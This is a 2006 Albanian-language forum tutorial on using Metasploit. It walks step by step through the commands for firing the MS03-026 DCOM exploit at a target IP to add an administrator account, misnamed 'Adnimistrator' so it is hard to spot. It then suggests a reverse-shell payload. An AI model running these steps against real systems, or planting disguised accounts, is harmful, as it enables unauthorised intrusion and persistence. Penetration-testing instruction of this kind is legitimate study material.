Tung njerzi. Zdi a keni ni per programin (aplikacionin) e quajtur Metasploit Framework. Ky osht njeri prej progsave me te mire nese doni me hack ose me testu rrjetin e juaj duke perdorur exploitat ma te ri. Kryesisht perdorja e nje exploit me metasploit bahet ne kta hapa: I) E zgjedh exploitin II) E zgjedh payloadin ("municionin") III) Ja jep opcionet IV) E ekzekuton --------- Ne vazhdim po munohn ame ju spjegu pak se qysh perdoret: 1. Shkarkoni dhe instaloni programin prej http://www.metasploit.org/projects/Framework/downloads.html Zgjedhni cilin verzion po e doni, dhe per cfar platforme Unix (Linux) ose Windows 2.Masi ta instaloni, startoni programin. Shkoni te folderi ku e keni programin dhe klikoni ne msfconsole http://img116.imageshack.us/img116/5691/startimi5bu.jpg 3.I kshyr qfar exploit ki ne dispozicion me komanden show exploits , edhe e zgjedh ate qi po e don. Ne rastin tone une po e perdori msrpc_dcom_ms03_026 3.a) E ve ne perdorim qat exploit me komanden use msrpc_dcom_ms03_026 4. Tash duhet me zgjedh municionin e ketij exploit. Kshyrum qfar municioni kena me komanden show payloads Ne rastin tone une po e perdori win32_adduser . Per secilin exploit edhe payload e keni nje pershkrim te vogel ne te djathte, ne rastin tone win32_adduser ekzekuton komanden net user /ADD ne kompjuterin cilin e sulmojm. Zgjedhja e municionit (payload) behet me komanden set PAYLOAD win32_adduser 5. Tash e perdorim komanden show options , per me kshyr se cilet opcione duhet me ja vnu na para se me perdor exploit. http://img157.imageshack.us/img157/2308/pergatitja6kl.jpg Te kolona Name e keni emrin e Opcionit cilit duhet te vendoset, Kolona Default tregon nese ai opcion ka vlere te paracaktuar, nese eshte zbrazet ather duhet me ja vendos nje Kurse Kolona Exploit: Tregon nese ai opcion eshte i nevojshem apo jo. Kolona Description permban nje pershkrim te vogel per ate opcion 6. Tash po ja ndreqim opcionet: Po e shohim opcioni RHOST nuk ka vlere te paracaktuar, dhe eshte e nevojshme, pra duhet me ja vendos na vete vlerat: Prej kolones description po e shofim qe RHOST qenka adresa cilen po dojm me sulmu, ne rastin tone 10.10.15.1 po ja dhame vleren: set RHOST 10.10.15.1 Njojt veprojm e dhe me opcionet tjera: set PASS 123456 - Passwordi per shfrytezuesin e ri set USER Adnimistrator - emri i shfrytezuesit (me qellim osht Adnimistrator qe me kan sa ma shtir mu dallu prej Administrator ;) ) Vini re: Opcionet dallojn prej Epxploitit ne exploit dhe prej payloadit ne payload. http://img50.imageshack.us/img50/8325/opcionet2kq.jpg 7. Tash krejt qka ka met mu ba osht me ekzekutu exploit me komanden: exploit Nese e merrni kete mesazh: http://img117.imageshack.us/img117/3997/patched2mf.jpg Dmth qe caku osht i mbrojtur nga ky lloj i sulmit. Fund. Tash te keni nje shfrytezues ne cakun e juaj me emrin Adnimistrator edhe me pass:123456 Provone payloadin: win32_reverse nese doni me marr nje shell (cmd) me Dministrator account ne cakun e juaj, veq mos harroni me ja ndreq opcionet. Liqe: http://www.datastronghold.com/articles/1.html http://www.nwcet.org/downloads/Metasploit_Penetration.pdf Mos harroni me marr exploit te ri prej http://www.metasploit.org/projects/Framework/exploits.html 8:01 PM 4/28/2006